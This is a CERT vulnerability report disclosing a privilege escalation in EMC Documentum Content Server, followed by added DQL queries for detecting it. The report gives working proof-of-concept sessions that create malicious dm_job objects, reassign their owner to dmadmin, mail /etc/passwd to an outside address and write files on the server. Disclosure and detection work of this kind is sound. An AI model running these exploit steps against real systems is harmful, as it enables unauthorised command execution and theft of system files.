Vulnerability Report Confirmation - [VRF#HUFU6FNP]

Your vulnerability report has been successfully received. The Report Tracking ID assigned to this report is VRF#HUFU6FNP. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org, referencing this Report Tracking ID.

------------------------------------------------------------------------

Vulnerability Report

Name: Andrey B. Panfilov
Organization: independent
Email Address: andrew@panfilov.tel
Telephone Number:

Vulnerability Description:

EMC Documentum Content Server: any user is able to elevate privileges, hijack the Content Server filesystem and execute arbitrary commands by creating malicious dm_job objects.

Documentum Content Server has some docbase methods that are not supposed to be used by regular users (such methods carry special permissions that prevent a regular user from invoking them). Examples of such methods:

1. mail method - emails a text file to a user

    API> retrieve,c,dm_method where object_name='mail'
    ...
    1001d92080000174
    API> dump,c,l
    ...
    USER ATTRIBUTES
      object_name   : mail
      owner_permit  : 7
      group_name    : docu
      group_permit  : 5
      world_permit  : 3
      method_verb   : ./dm_mailwrapper.sh

    #!/bin/sh
    # Mail wrapper: customize if you like
    # Server will pass in subject, address and content_file
    # Return of 0 means send succeeded, non-zero status results in the
    # server generating an error message iff the method was launched
    # synchronously.
    delete_contents=0
    if [ x"$1" = x"-delete_contents" ] ; then
        delete_contents=1
        shift
    fi
    subject=$1
    address=$2
    content_file=$3
    /bin/mail -s "$subject" "$address" < $content_file
    status=$?
    if [ $delete_contents = 1 ] ; then
        # remove the temporary content file once it is sent
        \rm $content_file
    fi
    exit $status

    Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
    1> execute do_method with method='mail',
    2> arguments='test andrew@panfilov.tel /etc/passwd'
    3> go
    [DM_METHOD_E_ASSUME_USER_UV]error: "Your method named (mail) failed to execute because the assume user process could not validation your user credentials. Assume User Process returned (245=DM_CHKPASS_BAD_LOGIN)."

2. dm_file_writer - writes data to text files residing on the Content Server filesystem

    API> retrieve,c,dm_method where object_name='dm_file_writer'
    ...
    1001d920800003a1
    API> dump,c,l
    ...
    USER ATTRIBUTES
      object_name   : dm_file_writer
      owner_name    : dmadmin
      owner_permit  : 7
      group_name    : docu
      group_permit  : 1
      world_permit  : 1
      method_verb   : dmbasic -eEntryPoint -f../install/admin/dm_file_writer.ebs

    Sub EntryPoint(FilePath As String, DmData As String, WriteMode As String)
        On Error Goto ErrorCatch
        Select Case WriteMode
            Case "DELETE"
                Call chgEntry(FilePath, DmData, WriteMode)
            Case "CREATE"
                Open FilePath For Append As #2
                Print #2, DmData
                Close #2
            Case "UPDATE"
                Call chgEntry(FilePath, DmData, WriteMode)
            Case "APPEND"
                Call chgEntry(FilePath, DmData, WriteMode)
        End Select
        DmExit 0
    ErrorCatch:
        Print Error$()
        DmExit 1
    End Sub

Though neither method can be invoked directly by a non-privileged user, an attacker is able to create a malicious dm_job object with the required parameters, after which Content Server will execute the docbase method on the job's behalf:

    Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
    1> create dm_job object
    2> set object_name = 'malicious job'
    3> set inactivate_after_failure = FALSE
    4> set max_iterations = 0
    5> set method_name = 'mail'
    6> set pass_standard_arguments = FALSE
    7> set run_interval = 1
    8> set run_mode = 1
    9> set run_now = TRUE
    10> set start_date = DATE('11/24/2013','mm/dd/yyyy')
    11> set expiration_date = DATE('12/11/2016','mm/dd/yyyy')
    12> set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy')
    13> set is_inactive = FALSE
    14> set world_permit=7
    15> append method_arguments = 'test'
    16> append method_arguments = 'andrew@panfilov.tel'
    17> append method_arguments = '/etc/passwd'
    18> go
    object_created
    ----------------
    0801d920805675b0
    (1 row affected)

Though Content Server checks the privileges of the dm_job's owner before executing the job, it is possible to change the owner of the created dm_job object, either through the API or through Webtop:

    Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
    Session id is s0
    API> set,c,0801d920805675b0,owner_name
    SET> dmadmin
    ...
    OK
    API> save,c,0801d920805675b0
    ...
    OK
    API>

The same chain, scripted end to end against the dm_file_writer method:

    ~]$ idql repo -Uuser -Ppassword >/dev/null <<_EOF_
    > create dm_job object
    > set object_name = 'malicious file writer'
    > set inactivate_after_failure = FALSE
    > set max_iterations = 0
    > set method_name = 'dm_file_writer'
    > set pass_standard_arguments = FALSE
    > set run_interval = 1
    > set run_mode = 1
    > set run_now = TRUE
    > set start_date = DATE('11/24/2013','mm/dd/yyyy')
    > set expiration_date = DATE('12/11/2016','mm/dd/yyyy')
    > set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy')
    > set is_inactive = FALSE
    > set world_permit=7
    > append method_arguments = '/tmp/test.txt'
    > append method_arguments = 'agentexec_has_vulnerability'
    > append method_arguments = 'CREATE'
    > go
    > _EOF_
    ~]$ iapi repo -Uuser -Ppassword >/dev/null <<_EOF_
    > retrieve,c,dm_job where object_name='malicious file writer'
    > set,c,l,owner_name
    > dmadmin
    > save,c,l
    > _EOF_
    ~]$ sleep 60
    ~]$ cat /tmp/test.txt
    agentexec_has_vulnerability
    ~]$

Can we provide your name to the vendor? Yes
Do you want to be publicly acknowledged? Yes
Vendor Contact Status: will not contact
Vendor Name: EMC
Vendor Contact Name:
Vendor Contact Email:
Vendor Contact Telephone Number:
Vendor Tracking ID:
Additional Vendor Information:
Affected System Configurations: All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited? Yes
Is there a public exploit? Yes
Vulnerability Impact:
Comments:
Attached File:
Date: 2014-04-25T14:52:21
Report Tracking ID: VRF#HUFU6FNP
CERT Tracking IDs: VU#315340

------------------------------------------------------------------------
Carnegie Mellon University ©2014 Carnegie Mellon University
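Added detection queries for repository administrators (not part of the report above and not EMC's code): DQL, run from idql as a superuser, that surfaces dm_job objects set up the way the report describes, that is, jobs pointed at the two privileged methods whose owner no longer matches the account that created them. The queries assume the standard dm_sysobject attributes r_creator_name, r_creation_date, r_modifier and r_modify_date are populated on dm_job as on any sysobject subtype.

```sql
-- Query 1: jobs that invoke the privileged docbase methods named in the report and whose
-- owner_name has diverged from the creating user. The ownership swap is what lets the job
-- pass the owner-privilege check, so owner <> creator is the key indicator.
-- (r_creator_name / r_modifier / r_modify_date: standard dm_sysobject attributes, assumed present.)
select r_object_id, object_name, owner_name, r_creator_name,
       r_creation_date, r_modifier, r_modify_date, method_name
  from dm_job
 where method_name in ('mail', 'dm_file_writer')
   and owner_name <> r_creator_name
 order by r_modify_date desc;

-- Query 2: the same owner/creator mismatch generalised to every job in the docbase,
-- combined with the report's world_permit=7 (world-writable job object). Either condition
-- alone is worth a look; both together closely match the pattern described above.
select r_object_id, object_name, owner_name, r_creator_name,
       method_name, run_now, is_inactive, a_next_invocation
  from dm_job
 where owner_name <> r_creator_name
    or world_permit = 7
 order by r_creation_date desc;
```

method_arguments is a repeating attribute and is deliberately left out of the select lists so each job comes back as a single row; dump the individual object ids from the results to inspect the arguments.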